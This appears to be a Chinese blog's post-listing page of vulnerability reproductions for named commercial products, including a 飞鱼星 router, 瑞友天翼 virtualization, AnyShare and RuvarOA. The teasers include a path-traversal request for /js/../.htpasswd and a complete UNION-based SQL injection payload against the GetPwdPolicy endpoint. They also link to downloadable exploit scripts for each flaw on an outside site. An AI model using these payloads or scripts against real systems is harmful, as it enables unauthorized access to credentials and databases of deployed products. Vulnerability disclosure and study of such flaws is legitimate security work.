- 博客(6)
- 收藏
- 关注
RSS订阅原创 飞鱼星-路由器存在敏感信息泄露漏洞
exp验证脚本:www.gddertr.xyz/飞鱼星-路由器存在敏感信息泄露漏洞.py。get请求 :/js/../.htpasswd。
2025-01-29 22:03:30
667
原创 瑞友天翼应用虚拟化系统 GetPwdPolicy SQL注入漏洞
CMD=GetPwdPolicy&User=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7e%2C%28SELECT+user()%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+-exp一键验证脚本:www.gddertr.xyz/瑞友天翼应用虚拟化系统 GetPwdPolicy SQL注入漏洞.py。返回admin即可验证漏洞。
2025-01-29 20:47:15
428
原创 停车场后台管理系统 LaneMonitor/GetVideo SQL注入漏洞复现
get请求:/LaneMonitor/GetVideo?poc验证脚本: www.gddertr.xyz/停车场后台管理系统 LaneMonitor SQL注入漏洞复现.py。
2025-01-29 04:29:08
670
原创 爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞
poc验证脚本:www.gddertr.xyz/爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露.py。
2025-01-29 03:05:49
463
原创 RuvarOA协同办公平台存在SQL注入漏洞
poc下载地址:www.gddertr.xyz/RuvarOA协同办公平台SQL注入.py。得到版本信息状态码为500。sqlmap进行注入。
2025-01-29 02:06:13
480
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人